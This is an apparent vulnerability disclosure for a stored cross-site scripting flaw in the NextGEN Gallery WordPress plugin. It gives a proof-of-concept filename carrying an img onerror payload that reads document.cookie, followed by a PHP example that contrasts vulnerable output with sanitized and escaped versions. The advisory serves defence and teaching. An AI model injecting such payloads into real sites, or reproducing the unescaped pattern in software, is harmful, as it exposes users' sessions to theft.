WordPress NextGEN Gallery 2.0.66.16 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : NextGEN Gallery
Affected Version : 2.0.66.16 (and most probably lower versions, if any)
Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Madhu Akula

Technical Details

Minimum Level of Access Required : Administrator
PoC - (Proof of Concept) :
http://localhost/wp-admin/admin.php?page=ngg_addgallery.php
Click on Image upload and give the image name as ("><img src=x onerror=prompt(document.cookie)>.png")
Video Demonstration : http://www.youtube.com/watch?v=SzNopJUE3nk
Type of XSS : Stored
Fixed in : 2.0.66.17
http://wordpress.org/plugins/nextgen-gallery/changelog/

Disclosure Timeline

Vendor Contacted : 2014-08-02
Plugin Status : Updated on 2014-08-04
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet

Plugin Description :
NextGEN Gallery is the most popular WordPress gallery plugin, and one of the most popular WordPress plugins of all time, with over 10 million downloads. It provides a powerful engine for uploading and managing galleries of images, with the ability to batch upload, import metadata, add/delete/rearrange/sort images, edit thumbnails, group galleries into albums, and more. It also provides two front-end display styles (slideshows and thumbnail galleries), both of which come with a wide array of options for controlling size, style, timing, transitions, controls, lightbox effects, and more.
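The stored XSS in the PoC above comes from an upload filename being written back into the admin page unescaped. The following PHP example is added here and is not NextGEN Gallery's code or its actual fix; it assumes the filename is echoed into an HTML attribute (as the `">` prefix of the PoC suggests), and the function names and the /gallery/thumbs/ path are hypothetical.

```php
<?php
// Added example: not plugin code. Function names and paths are hypothetical.

// Constructed sample input: the image name given in the PoC above.
$uploaded_name = '"><img src=x onerror=prompt(document.cookie)>.png';

// Vulnerable pattern: the stored filename is concatenated into markup as-is,
// so a quote in the name closes the attribute and the rest is parsed as HTML.
function render_thumb_vulnerable(string $filename): string {
    return '<img src="/gallery/thumbs/' . $filename . '" alt="' . $filename . '">';
}

// Mitigation 1 (on upload): reduce the name to a conservative character set
// and an allow-listed extension before it is ever stored.
function sanitize_upload_name(string $filename): string {
    $base = basename(str_replace('\\', '/', $filename));
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    $stem = pathinfo($base, PATHINFO_FILENAME);
    $stem = trim(preg_replace('/[^A-Za-z0-9._-]+/', '-', $stem), '-.');
    if ($stem === '') {
        $stem = 'image';
    }
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        throw new InvalidArgumentException('unsupported image extension');
    }
    return $stem . '.' . $ext;
}

// Mitigation 2 (on output): escape for the context the value lands in.
// This protects names stored before the upload filter existed.
function render_thumb_escaped(string $filename): string {
    $url = '/gallery/thumbs/' . rawurlencode($filename);                    // URL path segment
    $alt = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); // attribute value
    return '<img src="' . $url . '" alt="' . $alt . '">';
}

echo "vulnerable : ", render_thumb_vulnerable($uploaded_name), PHP_EOL;
echo "escaped    : ", render_thumb_escaped($uploaded_name), PHP_EOL;
echo "sanitized  : ", sanitize_upload_name($uploaded_name), PHP_EOL;
// With both applied, a legacy or new name renders as inert text only.
echo "both       : ", render_thumb_escaped(sanitize_upload_name($uploaded_name)), PHP_EOL;
```

Inside WordPress, the core helpers sanitize_file_name(), esc_attr() and esc_url() cover the same two steps.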